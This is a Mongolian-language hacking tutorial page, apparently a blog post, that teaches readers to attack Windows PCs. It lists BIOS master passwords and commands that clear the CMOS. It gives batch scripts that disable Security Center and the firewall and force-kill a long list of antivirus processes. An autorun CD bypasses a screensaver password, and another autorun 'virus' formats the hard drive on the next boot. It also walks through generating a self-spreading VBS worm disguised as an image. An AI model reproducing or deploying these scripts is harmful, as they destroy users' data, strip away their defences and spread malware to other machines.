Тэгэхлээр та зөв тэмдэгт өгж орлуулах хэрэгтэй.
Жиш: том Н байлаа гэхэд жижиг h орлуулах гэх мэт.
Бүр нарийн тэмдэгтүүдийг харая гэвэл та манай сангаас ASCII Table татаж авч
хараж болно. Мөн Hex Workshop татан аваарай.
BIOS Password Crack
Одоо та бүхэнд Bios Password-г хэрхэн Crack хийхийг харуулая.
Эхлээд энгийн аргаар үзэч хэрэгтэй. Зарим нэг BIOS master түлхүүр үгтэй байдаг
Award BIOS-д эдгээр түлхүүр үгийг өгөөд үз:
01322222
1EAAh
256256
589589
589721
?award
admin
alfarome
aLLy
aPAf
award
award_?
award.sw
AWARD SW
AWARD_SW
AWARD_PW
award_ps
AWARD?SW
awkward
BIOS
bios*
biostar
biosstar
CONCAT
CONDO
condo
djonet
efmukl
g6PJ
h6BB
HELGA-S
HEWITT RAND
HLT
j09F
j256
j262
j322
j64
lkw peter
lkwpeter
PASSWORD
SER
setup
SKY_FOX
SWITCHES_SW
Sxyz
SZYX
t0ch88
t0ch20x
ttptha
TTPTHA
TzqF
wodj
ZAAADA
zbaaaca
zjaaadc
zjaaade
Ami BIOS-д:
ami
amidecod
amipswd
AMIPSWD
AMI
A.M.I.
aammii
AMI~
amiami
AMI.KEY
AMISETUP
AMI?SW
AMI!SW
AMI_SW
bios310
BIOSPASS
CMOSPWD
KILLCMOS
589589
ami.kez
ami°
helgaЯs
HEWITT RAND
Vobis BIOS-д:
merlin
Advance Integration BIOS-д:
Advance
ALDI (Medion) BIOS-д:
medion
Amptron BIOS-д:
Polrty
AST BIOS-д:
SnuFG5
Biostar BIOS-д:
Biostar
Q54arwms
Concord BIOS-д:
last
CTX International:
CTX_123
CyberMax BIOS-д:
Congress
Daytek und Daewoo BIOS-д:
Daytec
Daewuu
DELL BIOS-д:
DELL
Digital Equipment BIOS-д:
komprie
Enox BIOS-д:
xo11nE
Epox BIOS-д:
central
Freetech BIOS-д:
Posterie
HP Vectra Serie BIOS-д:
hewlpack
IBM BIOS-д:
IBM
MBIUO
sertafu
Iwill BIOS-д:
iwill
Jet Way BIOS-д:
spoom1
Joss Technology BIOS-д:
57gbz6
Technolgi
MachSpeed BIOS-д:
sp99dd
Magic-Pro BIOS-д:
prost
Megastar BIOS-д:
Star
Micron BIOS-д:
sldkj754
xyzall
Micronics BIOS-д:
dn_04rjc
M Technology BIOS-д:
mMmM
Nimble BIOS-д:
xdfk9874t3
Packard Bell BIOS-д:
Bell9
QDI BIOS-д:
QDI
Quantex BIOS-д:
teX1
xljlbj
Research BIOS-д:
Col2ogro2
Shuttle BIOS-д:
Spacve
Siemens Nixdorf BIOS-д:
SKY_FOX
Speedeasy BIOS-д:
lesarot1
SuperMicro BIOS-д:
ksdjfg934t
TMC BIOS-д:
BIGO
Toshiba BIOS-д:
24Banc81
Toshiba
toshy99
Vextrec Technology BIOS-д:
Vextrec
WIMBIOSnbsp v2.10 BIOS-д:
Compleri
Zenith BIOS-д:
3098z
Zenith
Zeos BIOS-д:
zeosx
Compaq BIOS-д:
compaq
Tinys BIOS-д:
Tiny
IBM Aptiva BIOS-д:
Энэ BIOS-д Master түлхүүр үг байхгүй харин нэг арга байдаг. Компютер асаах үед
хулганыхаа хоёр товчлуурийг хамт дараад хүлээ.
Toshiba Laptops:
Энэ BIOS-д Master түлхүүр үг байхгүй харин нэг арга байдаг. Компютер асаах үед
зүүн талын Ctrl товч дараад хүлээ. Хэрэв эдгээр арга тус болохгүй бол мөн
бололцоотой бол Компютер онгойлгоод Jumper(анхаар) default болгох хэрэгтэй.15 -
60 Min буцаагаад хийх хэрэгтэй.
Өөр нэг арга бол MS-DOS-с арилгах арга юм:
debug
o 70 2E
o71 FF
Q
QBasic дээрээс бол:
10 OUT &H70,17
20 OUT &H71,0
AMI & Award Bios-д бол:
debug
o 70 17
o 71 17
Q
QBasic-с бол:
OUT &H70,&H17:OUT &H71,&H17
Хэрэв Assembler мэддэг бол:
mov dx, 070h
mov al, 02Eh
out dx, al
inc dx
xor al, al
out dx, al
Хэрэв та BIOS-оо дуудах аргаа мартсан бол
Del дарах AMI, Award
Esc дарах Toshiba
F1 дарах Toshiba; Phoenix; Late model PS/1 Value Point мөн 330s
F2 дарах NEC
F10 дарах RH corner of screen Compaq
Ins дарах IBM PS/2s w/ Reference Partition
Alt Enter дарах Dell
Alt ? дарах PS/2s
Ctrl-Esc дарах General
Ctrl Ins дарах PS/2s
Ctrl Alt Esc дарах AST Advantage, Award, Tandon
Ctrl Alt дарах General
Ctrl Alt S дарах Phoenix
Ctrl Alt Ins дарах Zenith, Phoenix
Ctrl S дарах Phoenix
Ctrl Shift Esc дарах Tandon 386
Shift Ctrl Alt Num Pad Del дарах Olivetti PC Pro
Setup disk-р орох хуучин Compaqs, Epson (Gemini), IBM, IBM PS/2, Toshiba, хуучин
286s
Мөн та Password-ийн мэдэж авахыг хүсвэл та манай сангаас Cmos password
recovery tools 4.5 татаж аваарай.
Энэ Tool нь:
- ACER/IBM BIOS
- AMI BIOS
- AMI WinBIOS 2.5
- Award 4.5x/4.6x/6.0
- Compaq (1992)
- Compaq (Шинээр гарсан)
- IBM (PS/2, Activa, Thinkpad)
- Packard Bell
- Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev
1.13.1107
- Phoenix 4 release 6 (User)
- Gateway Solo - Phoenix 4.0 release 6
- Toshiba
- Zenith AMI
эдгээр BIOS-ийн түлхүүр үгийг олно.
VBS-р Link үүсгэх
Одоо та бүхэнд дэлгэц дээр Link үүсэгдэг *.vbs-г харуулая.
txt Editor нээгээд үүнийг бич:
Const strProgramtitel="Text Editor"
Const strProgram ="%SystemRoot%system32 otepad.exe"
Dim objShortcut
Dim objShell
Set objShell= WScript.CreateObject("Wscript.Shell")
strLPfad=objShell.SpecialFolders("Desktop")
Set objShortcut=objShell.CreateShortcut(strLPfad & "" & strProgramtitel & ".lnk")
objShortcut.TargetPath= strProgram
objShortcut.Description= "strProgramtitel"
objShortcut.Save
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод link.vbs гэсэн нэрээр хадагла.
Const strProgramtitel="Text Editor" (Нэр өгч байна)
Const strProgram ="ystemRootsystem32 otepad.exe" (ямар Program-г дуудах. Яг энд
та өөрийнхөө Virus-г өгөх хэрэгтэй)
...
strLPfad=objShell.SpecialFolders("Desktop") (Дэлгэц дээр)
Энхүү *.vbs нь Editor.exe-г дэлгэц дээр Link үүсгэж байна.
Windows XP SP2-ийн Security Center-ийг унтраах
Windows XP SP2-ийн Security Center-ийг унтраах Virus гэвэл txt Editor нээгээд
үүнийг бич:
@ECHO OFF
sc stop wscsvc>NUL
sc delete wscsvc>NUL
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод sckill.bat гэсэн нэрээр хадагла.
Windows XP SP2-ийн Firewall-ийг унтраах
Windows XP SP2-ийн Firewall-ийг унтраах Virus. Энэ нь Register-т өөрчлөлт
оруулдаг юм.
Одоо txt Editor нээгээд үүнийг бич:
@reg add
"HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicySta
ndardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f>NUL
@reg add
"HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicySta
ndardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 00000000 /f>NUL
@reg add
"HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicySta
ndardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f>NUL
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод fwkill.bat гэсэн нэрээр хадагла.
Та бүхэн эдгээр Virus-үүд DOS Batch Programming дээр хийгдэж байгааг харсан
байх.Энэ .bat File-г хэрхэн .exe болгож хөрвүүлэхийг дараа харуулна.
AntiVirus Test
Хэрэв та хамгийн бага хэмжээтэй Virus-г мэдэхийг хүсвэл txt Editor нээгээд үүнийг
бич:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TESTFILE!$
H+H*
одоо тэгээд хадгалаад AntiVirus-ээрээ хайлгаад үз. Хэрэв Virus олдов гэж мэдээлэл
гарч байвал таны AntiVirus чинь зүгээр байна гэсэн үг. Энэ Virus нь ямарч хор
нөлөөгүй ба зөвхөн AntiVirus-г шалгахад зориулагдсан юм.
Passwort-тай Screensaver
Screensaver нь Passwort-р хамгаалагдсан компютерийг хэрхэн Crack-дах вэ гэвэл:
1-рт таньд 1 ширхэг CD
2-рт таньд CD бичигч(шарагч)
3-рт Text Editor
Та одоо ердийн нэг txt Editor нээгээд үүнийг бич.
[autorun]
open=screenkill.bat
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод autorun.inf гэсэн нэрээр хадагла.
Дахиад txt Editor нээгээд үүнийг бич:
@echo off
ren %windir%system sys
echo yamar neg tovtch dar
pause >nul
ren %windir%sys system
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод screenkill.bat гэсэн нэрээр хадагла.
Эдгээр 2 File-aa (autorun.inf, screenkill.bat) CD бичээд CD тоглуулагчид нь хий. Энэ
үед Screensaver алга болно. Одоо ямар нэг товч дар.(Заавал дарах ёстой шүү) За
энгээд та энэ компютер дээр бүрэн ажиллах боломжтой боллоо.
Batch Virus
Batch Virus хэрхэн бичих тухай та бүхэнд харуулая!(Анхаар маш болгоомжтой
ажилаарай)Энэ Virus-ний гол чиглэл нь format хийх юм.
1-рт таньд 1 ширхэг CD
2-рт таньд CD бичигч(шарагч)
3-рт Text Editor
4-рт Туршилтат орох Компютер
Та одоо ердийн нэг txt Editor нээгээд үүнийг бич.
[autorun]
open=autostart.bat
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод autorun.inf гэсэн нэрээр хадагла.
Дахиад txt Editor нээгээд үүнийг бич.
@echo off
ECHO REGEDIT4>%SystemRoot%urtgeh.reg
ECHO
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>
>%SystemRoot%urtgeh.reg
ECHO "Virus"="%SystemDrive%WindowsVirus.bat">>%SystemRoot%urtgeh.reg
regedit /s %SystemRoot%urtgeh.reg
ECHO @echo off>>%SystemRoot%Virus.bat
ECHO format %Homedrive% /u >nul>>%SystemRoot%Virus.bat
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод autostart.bat гэсэн нэрээр хадагла.
Эдгээр 2 File-aa (autorun.inf, autostart.bat) CD бичихдээ хамт нь оруулаж өгөх
хэрэгтэй. Эхний autorun.inf ямар нэг CD-г тоглуулагчид хийсэн тохиолдолд тухайн
өгсөн File-г Automat-р уншина гэсэн үг. Бидний тохиолдолд autostart.bat уншихаар
байна.
autostart.bat тайлбар:
@echo off - гэдэг нь бичигдэлийг нуух
ECHO REGEDIT4>%SystemRoot%urtgeh.reg
ECHO
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>
>%SystemRoot%urtgeh.reg
ECHO "Virus"="%SystemDrive%WindowsVirus.bat">>%SystemRoot%urtgeh.reg
- гэдэг нь burtgeh.reg File-г Windows Folder дотор үүсгэж байна.
regedit /s %SystemRoot%urtgeh.reg - гэдэг burtgeh.reg гэсэн File-г нууцаар
ачааллаж байна.(Register хийж байна) Ингэхээр burtgeh.reg File ийм байдалтай
болно.
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Virus"="%SystemDrive%WindowsVirus.bat"
Энэ юу гэсэн үг вэ гэхлээр Автоматаар дараагийн удаа комютерийг ачааллах үед
Virus.bat гэсэн File-г дуудан ажилуулна.
ECHO @echo off>>%SystemRoot%Virus.bat
ECHO format %Homedrive% /u >nul>>%SystemRoot%Virus.bat - гэдэг нь Virus.bat
File-г Windows Folder дотор үүсгэж байна. Ингэхээр burtgeh.reg File ийм байдалтай
болно.
@echo off
format %Homedrive% /u >nul
Энэ юу гэсэн үг вэ гэхлээр Автоматаар Компютерийн үндсэн Hard-г Format хийж
байна. Үүнийг цааш улам боловсронгуй болгоорой.
Batch Virus ба AntiVirus FireWall унтраах
Batch ашиглан AntiVirus FireWall-г хэрхэн унтраадаг Virus-ний тухай та бүхэнд
харуулая!
Та одоо ердийн нэг txt Editor нээгээд үүнийг бич.
@echo off
taskkill /f /im NISUM.EXE
taskkill /f /im ccPxySvc.exe
taskkill /f /im navapsvc.exe
taskkill /f /im NPROTECT.EXE
taskkill /f /im SAVScan.exe
taskkill /f /im ccApp.exe
taskkill /f /im AVGCTRL.EXE
taskkill /f /im AVGUARD.EXE
taskkill /f /im AVWUPSRV.EXE
taskkill /f /im AVGNT.EXE
taskkill /f /im MSKSrvr.exe
taskkill /f /im avpcc.exe
taskkill /f /im avpm.exe
taskkill /f /im vsmon.exe
taskkill /f /im zapro.exe
taskkill /f /im mcvsrte.exe
taskkill /f /im mcshield.exe
taskkill /f /im mcagent.exe
taskkill /f /im mcvsshld.exe
taskkill /f /im fsgk32st.exe
taskkill /f /im FSGK32.EXE
taskkill /f /im fssm32.exe
taskkill /f /im fsbwsys.exe
taskkill /f /im FSMA32.EXE
taskkill /f /im FSMB32.EXE
taskkill /f /im FCH32.EXE
taskkill /f /im FAMEH32.EXE
taskkill /f /im fsav32.exe
taskkill /f /im fsdfwd.exe
taskkill /f /im FSM32.EXE
taskkill /f /im BackWeb-4476822.exe
taskkill /f /im _AVP32.exe
taskkill /f /im _AVPCC.exe
taskkill /f /im _AVPM.exe
taskkill /f /im _SMC.exe
taskkill /f /im ACKWIN32
taskkill /f /im ADMINTOOL.exe
taskkill /f /im ADVXDWIN.exe
taskkill /f /im AGENTA.exe
taskkill /f /im AGENTSVR.exe
taskkill /f /im ALERTSVC.exe
taskkill /f /im ALG.exe
taskkill /f /im ALOGSERV.exe
taskkill /f /im AMON.exe
taskkill /f /im AMON9X.exe
taskkill /f /im ANTITROJ.exe
taskkill /f /im ANTI-TROJAN.exe
taskkill /f /im ANTIVIRUS.exe
taskkill /f /im ANTS.exe
taskkill /f /im APIMONITOR.exe
taskkill /f /im APLICA32.exe
taskkill /f /im APVXDWIN.exe
taskkill /f /im ASHDISP.exe
taskkill /f /im ASHQUICK.exe
taskkill /f /im ATCON.exe
taskkill /f /im ATGUARD.exe
taskkill /f /im ATRO55EN.exe
taskkill /f /im ATUPDATER.exe
taskkill /f /im ATWATCH.exe
taskkill /f /im AUTODOWN.exe
taskkill /f /im AUTOTRACE.exe
taskkill /f /im AVCONSOL.exe
taskkill /f /im AVENGINE.exe
taskkill /f /im AVGCC32.exe
taskkill /f /im AVGCTRL.exe
taskkill /f /im AVGNT.exe
taskkill /f /im AVGSERV.exe
taskkill /f /im AVGSERV9.exe
taskkill /f /im AVGW.exe
taskkill /f /im AVKPOP.exe
taskkill /f /im AVKSERV.exe
taskkill /f /im AVKSERVICE.exe
taskkill /f /im AVKWCTL.exe
taskkill /f /im AVKWCTL9.exe
taskkill /f /im AVP.exe
taskkill /f /im AVP32.exe
taskkill /f /im AVPCC.exe
taskkill /f /im AVPM.exe
taskkill /f /im AVSCHED32.exe
taskkill /f /im AVSYNMGR.exe
taskkill /f /im AVWIN.exe
taskkill /f /im AVWINNT.exe
taskkill /f /im AVXGUI.exe
taskkill /f /im AVXLIVE.exe
taskkill /f /im AVXMONITOR9X.exe
taskkill /f /im AVXMONITORNT.exe
taskkill /f /im AVXW.exe
taskkill /f /im AVXQUAR.exe
taskkill /f /im BD_PROFESSIONAL.exe
taskkill /f /im BIDEF.exe
taskkill /f /im BIDSERVER.exe
taskkill /f /im BIPCP.exe
taskkill /f /im BISP.exe
taskkill /f /im BLACKD.exe
taskkill /f /im BLACKICE.exe
taskkill /f /im BOOTSCAN.exe
taskkill /f /im BOOTWARN.exe
taskkill /f /im BORG2.exe
taskkill /f /im BS120.exe
taskkill /f /im CCEVTMGR.exe
taskkill /f /im CDP.exe
taskkill /f /im CFGINTPR.exe
taskkill /f /im CFGWIZ.exe
taskkill /f /im CFIADMIN.exe
taskkill /f /im CFIAUDIT.exe
taskkill /f /im CFINET.exe
taskkill /f /im CFINET32.exe
taskkill /f /im CLAW95.exe
taskkill /f /im CLAW95CF.exe
taskkill /f /im CLEAN.exe
taskkill /f /im CLEANER.exe
taskkill /f /im CLEANER3.exe
taskkill /f /im CLEANPC.exe
taskkill /f /im CMGRDIAN.exe
taskkill /f /im CMON016.exe
taskkill /f /im CONNECTIONMONITOR.exe
taskkill /f /im CPF9X206.exe
taskkill /f /im CPFNT206.exe
taskkill /f /im CTRL.exe
taskkill /f /im CV.exe
taskkill /f /im CWNB181.exe
taskkill /f /im CWNTDWMO.exe
taskkill /f /im DEFSCANGUI.exe
taskkill /f /im DEFWATCH.exe
taskkill /f /im DEPUTY.exe
taskkill /f /im DOORS.exe
taskkill /f /im DPATROL.exe
taskkill /f /im DPF.exe
taskkill /f /im DRWEB32.exe
taskkill /f /im DRWEBSCD.exe
taskkill /f /im DVP95.exe
taskkill /f /im DVP95_0.exe
taskkill /f /im ECENGINE.exe
taskkill /f /im EFPEADM.exe
taskkill /f /im ENT.exe
taskkill /f /im ESAFE.exe
taskkill /f /im ESCANH95.exe
taskkill /f /im ESCANHNT.exe
taskkill /f /im ESCANV95.exe
taskkill /f /im ESPWATCH.exe
cls
exit
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод untraah.bat гэсэн нэрээр хадагла.
taskkill /f /im blabla.exe Энэ юу гэсэн үг вэ гэхлээр blabla.exe гэсэн Program-ийг
aсуухгүйгээр унтраа гэсэн үг юм.
Та бүхэн өөрийн мэдэх AntiVirus мөн Firewall нэмэж улам сайжруулаж болно.
Visual Basic Worm хийх
Program-н хэл мэддэгүй хүмүүст зориулан хэрхэн VB worm/virus хийх талаар
харуулая. Таньд юуны өмнө Vbswg 2 Beta гэсэн Tool байхад болно. Та одоо манай
сангаас татаж аваад задлаад Vbswg.exe дууд.
Одоо та өөрийн үүсгэх гэж буй Worm-доо нэр өг worm Name гэдэг дээр. File Name
гэдэг мөн нэр өг. jpg.vbs гэсэн нь нэгэн хууралт юм. Нэг ёсондоо jpg гэсэн зураг
мэт харагдах болно гэсэн үг. Одоо та Startup гэдэг дээр дар. Энэ юу гэсэн үг вэ
гэхлээр дараагын удаа компютер асхад дахин Worm-оо ажиллуулахаар болгож
байна.
Одоо та E-Mail дээр дар. Энэ таны Worm нь Outlook-г ашиглан тархана гэсэн үг.
Одоо та IRC дээр дар. энэ таны Worm нь IRC-г (mIRC chat) ашиглан тархана гэсэн
үг.
Одоо та Infect дээр дар. Энэ таны Worm нь бусад vbs file-уудад халдана тархана
гэсэн үг.
Одоо та Payload дээр дар. Энэ одоо таны Worm-ийн халдварлагдсан компютерт
хийх үйл ажилгаа гэсэн үг.
Show message гэдэг мэдээлэлийн цонх харуулана гэсэн үг.
Goto Url гэдэг нь Internet хуудас дуудана.
Change Registered owner name гэдэг нь хэрэглэгчийн нэрийг өөрчөлнө гэсэн үг.
Shut Down гэдэг нь компютерийг унтраана.
Random гэдэг энэ worm маань хэдэн удаа үйлдэлээ давтахийг зааж өгч байна.
Date гэдэг энэ worm маань хэдэн сарийн хэддэх өдөр идвэхжихийг зааж өгч байна.
Та бүхэн тэгээд Extras ашиглан улам сайжруулаж болно. Одоо Generate дараад л
боллоо.
CRACKER
Cracker гэдэг нь товч үгээр: Комютерлуу нэвтрэн орож хохирол учруулах мөн ямар
нэг прогаммд өөрчлөлт оруулах эсвэл эвдлэн сүйтгэх.
Сэтгэгдэл бичих
Сэтгэгдлүүд:
BIOS
Надад BIOS пассвордын талаар асуудал гараад байна аа. Тэгээд надад туслаа ч... Миний e-mail хаяг Batjinnn@yahoo.com...
бичсэн BJ003 цаг: 13:32, 2008-11-01 | Холбоос | |